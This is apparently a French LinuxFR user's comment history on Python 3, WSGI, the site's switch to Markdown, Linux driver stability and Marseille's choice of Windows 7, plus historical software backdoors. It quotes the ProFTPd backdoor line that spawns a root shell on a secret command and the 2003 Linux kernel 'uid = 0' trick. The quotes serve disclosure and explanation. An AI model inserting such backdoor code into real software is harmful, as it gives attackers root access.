Victor STINNER a écrit 1639 commentaires

Tous les langages, à ma connaissance, donnent 0 pour « 1/2 »

Donc tu considères, par exemple, qu'Octave n'est pas un langage ? :-)

octave:1> 1/2
ans =  0.50000

Python est de plus en plus utilisé dans le milieu scientifique, notamment grâce à NumPy+SciPy, et 1/2 qui donne 0 fait un peu tâche.

Comme chaque changement majeur du langage, ce changement sur la division s'est fait via une demande d'amélioration de Python (PEP) : PEP 238: Changing the Division Operator. Cette PEP explique en détail pourquoi ce changement était nécessaire.

J'ai remonté l'info, ça a été corrigé.

Si tu vas lire le 2e lien de la dépêche, tu risques de tomber sur la section suivante en te faisant mal : PEP 3333: Python Web Server Gateway Interface v1.0.1.

Il y a eu des discussions houleuses au sujet de WSGI en Python 3, oui, mais un consensus a été trouvé : la PEP 3333 (WSGI "1.0.1") a été acceptée. Les modules cgi et wsgiref ont d'ailleurs été lourdement corrigés améliorés dans Python 3.2.

WSGI 1.0.1 est un sale hack, ou "consensus" (pour être politiquement correct), pour offrir une meilleure compatibilité entre Python 2 et Python 3. La prochaine version de WSGI séparera correctement octets et caractères pour mieux exploiter les possibilités offertes par Python 3 avec sa dictinction entre les types bytes et str. Par contre, je n'ai pas assez suivi le sujet pour pouvoir donner des pointeurs pertinents vers la nouvelle version brouillon de WSGI. Il semble qu'il y ait plusieurs équipes qui se livrent une guéguerre en disant que leur WSGI 2.0 est mieux :-)

Blender exige Python 3 depuis sa version 2.5. Eric 5 (IDE pour Python) est écrit en Python 3.

BIND 10, projet en cours de développement, peut être scripté en Python 3.

Je prends ça comme un compliment.

Avec Templeet, les dépêches LinuxFR étaient écrites dans un pseudo-HTML, difficile à maitriser. Il y avait de nombreuses subtilités sur les retours à la ligne. Pour obtenir un rendu correct, il fallait supprimer les retours à la ligne autour des listes, ce qui donnati un code HTML illisible. Markdown est un énorme soulagement pour moi !

Plusieurs modérateurs peuvent maintenant éditer différentes parties (paragraphes) d'une même dépêche, ce qui évite le gros verrou sur l'ensemble du texte qui ralentissait la relecture.

Comme le code source du nouveau site web est plus récent et réutilise un framework existant, il est fort à parier que les nouveaux (et anciens ?) bugs seront corrigés plus rapidement qu'avant.

Perso quand je supprime un fichier source par erreur, je vais le récupérer sur github ou bitbucket où y'a une copie gardée bien au chaud :-)

... quand le pilote du contrôleur USB se vautre lamentablement

Ca doit faire 6 ans que j'utilise Linux et je n'ai jamais eu de plantage lié à USB (pourtant j'ai branché plusieurs disques, souris, claviers, iPod, iPhone et autres gadgets).

j'apprécie que quand le traducteur ext2fs se vautre ...

J'ai déjà entendu parler de plantages ext2 ou ext3, mais après une très longue période (plusieurs mois). Je crois qu'une fois (je m'en souviens très mal), j'ai eu un plantage ext3, mais j'étais en train de bidouiller, voir chercher à faire planter ext3.

Bref : avoir un OS qui résiste aux plantages, c'est rigolo, mais en pratique (avec Linux), ça semble un peu inutile (pour les pilotes les plus courants dumoins).

Bah Attila Kinali écrit "First i want to give you a warm FUCK YOU ALL! for what you've written and done the last few days." C'est clair non ? :-)

FreeBSD et OpenBSD sont développés avec CVS. D'ailleurs, CVS est aussi nécessaire sur le poste client pour utiliser les ports FreeBSD non ?
http://wiki.freebsd.org/VersionControl

Tiens, il semble d'ailleurs que l'OS plus libre que libre (FreeBSD) utilise d'ailleurs un logiciel proprio en plus pour gérer son code : Perforce.

En même temps (9 au 17 mars), il y a Pycon US à Atlanta (Géorgie). C'est le plus gros événement autour du langage Python. La liste des conférences acceptées est en ligne, mais pas encore le programme :
http://us.pycon.org/2011/schedule/lists/talks/

Pycon US, c'est 2 jours de tutoriels (payants), 3 jours de conférences et 4 jours de sprints (journées où des développeurs travaillent ensemble sur un projet donné, il y a plusieurs sprints en parallèle). L'entrée est payante (entre 200 et 750$ selon le moment où vous achetez le billet et selon que vous soyez étudiant, particulier ou professionnel).

Les diaporamas et vidéos de l'année 2010 sont disponible en ligne :
http://us.pycon.org/2010/conference/

Ahem. Pour cela il faudrait que les pilotes de toutes les cartes graphiques fonctionnent à merveille sous Linux, y compris dans les anciennes distributions Linux. À moins que la version qui va suivre Firefox 4.0 ne souhaite pas supporter les distributions Linux ayant plus de 6 mois ?

Je me souviens de mon expérience avec OpenGL il y a quelques années : on avait passé le moteur du jeu Wormux de SDL à OpenGL (lors du passage de ClanLib 0.6 à 0.8 si je me souviens bien). Plusieurs joueurs sont passés de 30 à 50 images par seconde à moins d'une image par seconde : jeu injouable. (Par contre, certains joueurs ayant la bonne carte graphique avec le bon pilote -genre Nvidia et le pilote proprio- avaient un jeu plus rapide.)

Les développeurs de ClanLib voulaient simplifier leur code en imposant OpenGL... sauf que les pilotes OpenGL sous Linux, c'était pas ça. J'avais tenté de réintégrer le support de SDL dans ClanLib, mais c'était assez complexe, je n'avais pas eu le temps de finir et les développeurs ClanLib ne m'ont pas vraiment soutenu.

Finalement, on a pris la sage décision de migrer directement à SDL, et depuis tout va bien côté rendu graphique :-) Il me semble d'ailleurs que SDL peut utiliser OpenGL en interne (si on active une certaine option ?).

http://pyroom.org/ est libre par contre.

http://inetcore.com/project/ipv4ec/index_fr.html

Relire aussi la dernière dépêche à ce sujet : http://linuxfr.org/2010/10/29/27523.html

J'aime bien le nom du document : « Migration 7 VDM.pdf » :-)

Tout d'abord, merci à l'agent du département des Bouches du Rhône qui a mis en ligne ces documents ! Ca permet de comprendre un peu mieux les revirements de situations dans les projets de migration à Linux.

Extraits des raisons du choix de Windows Seven plutôt que Linux sur les postes de travail de la mairie de Marseille :

« la faible part de marché détenue actuellement par Linux considérée comme un risque quant à sa pérennité »

Il me semble que Linux existe depuis 1991, il existe donc depuis environ 20 ans, et vu ses parts de marché sur les serveurs (et des supercalculateurs), je doute très fortement qu'il ait un risque quant à sa pérénnité. De plus, Linux est de plus en plus présent dans l'embarqué (Android par exemple). Linux est également utilisé par de grandes entreprises comme Google.

« l'inconvénient d'amener avec Linux un changement d'usage fort pour la majorité de nos utilisateurs alors que nous les sollicitons et les solliciterons pour bien d'autres changements prévus (exemple : éradication des postes Mac, utilisation de Open Office, changement d'outil GroupWare, la politique d'impression, ...) »

Passer de Mac OS X (Apple) à Windows, ça me semble être kif-kif avec le passage de Mac OS X à Linux. En même temps, je suppose que le GroupWare est en ligne (web), donc pas de changement, et OpenOffice est identique sous Windows et Linux. Je ne trouve pas cette justification recevable. En plus, la migration peut être douce avec comme première étape, le passage à Thunderbird pour la messagerie électronique. La migration vers des postes de travail Linux est une chose de plus en plus courante, y compris à grande échelle, ça ne doit pas être dur de trouver des informations et des prestataires pour réaliser ce genre de mission.

« notre stock d'applications métiers n'utilisant pas les technologies Web indispensables à un portage sous Linux et l'analyse nous portant à penser que les éditeurs fourniront en premier lieu leur version compatible pour Seven avant de proposer celle pour Linux »

Je pense qu'une administration a les sous pour commander une version Linux. Ou mieux (plus pérenne), acheter du service à une SSLL pour migrer à une solution libre compatible avec Linux (voir Windows, Linux et Mac).

« Les atouts de Linux tels que l'économie sur les licences et l'autonomie technique ont bien été considérées mais ne suffisent pas pour contrebalancer l'avantage donné à Seven dans les conclusions de notre étude. »

Je me demande s'ils ont du changer des anciens ordinateurs qui n'étaient pas assez puissants pour « bénéficier » de Windows Seven.

Est-ce si difficile de trouver un administrateur système pour gérer un parc de machines sous Linux à Marseille ?

L'article Wikipédia est correct (et sourcé !), c'est bien ProFTPd. Punaise, je n'arrête pas de les confondre !

Oups oui, c'est ProFTPd pardon.

Il y a eu au moins deux tentatives d'introduction d'une porte dérobée dans un logiciel libre, dans PostgreSQL (en 2010) et dans le noyau Linux (2003). Dans les deux cas, la faille introduit était flagrante. D'ailleurs, pour PostgreSQL, l'archive verrolée est restée en ligne 5 jours, et la faille dans le noyau Linux a été vue et corrigée en un jour à peine.

Après il existe aussi les portes dérobées involontaires, comme la fameuse histoire de Debian+OpenSSL, ou encore l'installeur Ubuntu qui stockait le mot de passe root en clair sans un fichier lisible par n'importe qui.

J'ai complété l'article Wikipédia en documentant 7 affaires de portes dérobées :
http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e

Une attaque similaire à été menée contre PostgreSQL : l'archive contenant la dernière version a été modifiée pour introduire une commande (HELP ACIDBITCHEZ) donnant un accès shell. L'archive verrolée a été poussée sur le serveur FTP principal, puis les miroirs ont recopiés cette archive.
http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e#ProFTPd(...)

Une personne possédant les archives verrolées et non verrolées peut se rendre compte de la modification en cherchant les différences :
+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

Il existe une affaire de clé de chiffrement asymétrique dont une clé publique appellée « _NSAKEY » s'est retrouvée dans Windows NT4 : http://fr.wikipedia.org/wiki/NSAKEY

Je suppose que pasBill pasGates fait référence à ça.

Ce n'est pas « if (current->uid = 0) » qui a été introduit, cette syntaxe produisant un avertissement avec les compilateurs C pas trop bêtes. C'est « if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) » qui ne produit pas d'avertissement car l'assignation est entourée par des parenthèses.

Il arrive tellement souvent qu'on se trompe (écrire a=b au lieu de a==b dans un if), que les compilateurs devraient générer une erreur. Sauf que beaucoup de programmes utilisent une assignation dans un if pour économiser une ligne ... Je trouve ça malsain d'économiser une ligne, ça rend le code plus difficile à relire et donc à maintenir.

La grammaire de Python interdit une assignation dans un test : « if a=b: ... » génère une SyntaxError.

La source primaire est un email sur la liste Bugtraq. Cet email parle de « HP MSA2000 G3 », mais le nom complet est « HP StorageWorks P2000 G3 MSA Array Systems ». Selon SecurityWeek, seul un modèle (P2000 G3) est impacté et non pas l'ensemble de la gamme (MSA). P2000 G3 fait parti de la gamme MSA.

J'ai mis à jour l'article Wikipédia pour indiquer le modèle exact : http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e#HP_Stor(...)

Euh... Cette affaire fait beaucoup de bruit et finalement, il y a peu de choses intéressantes qui en ressortent pour le moment. Une dépêche sur le sujet a été proposée et refusée sur LinuxFR. Avant d'en parler, il faudrait en savoir un peu plus.

Mise à jour de l'article SecurityWeek :

« Update 11:23AM EST 12/15/2010 - SecurityWeek has received a statement from HP on the issue: "HP identified a potential security issue with the HP StorageWorks P2000 G3 only. This does not impact HP’s MSA line of storage solutions. HP has identified an immediate fix for this issue and is rapidly informing customers of the solution." »

http://www.securityweek.com/backdoor-vulnerability-discovere(...)

T'es sûr qu'on peut le modifier ? Pourquoi HP considère ça comme une faille de sécurité et va proposer un correctif dans ce cas ?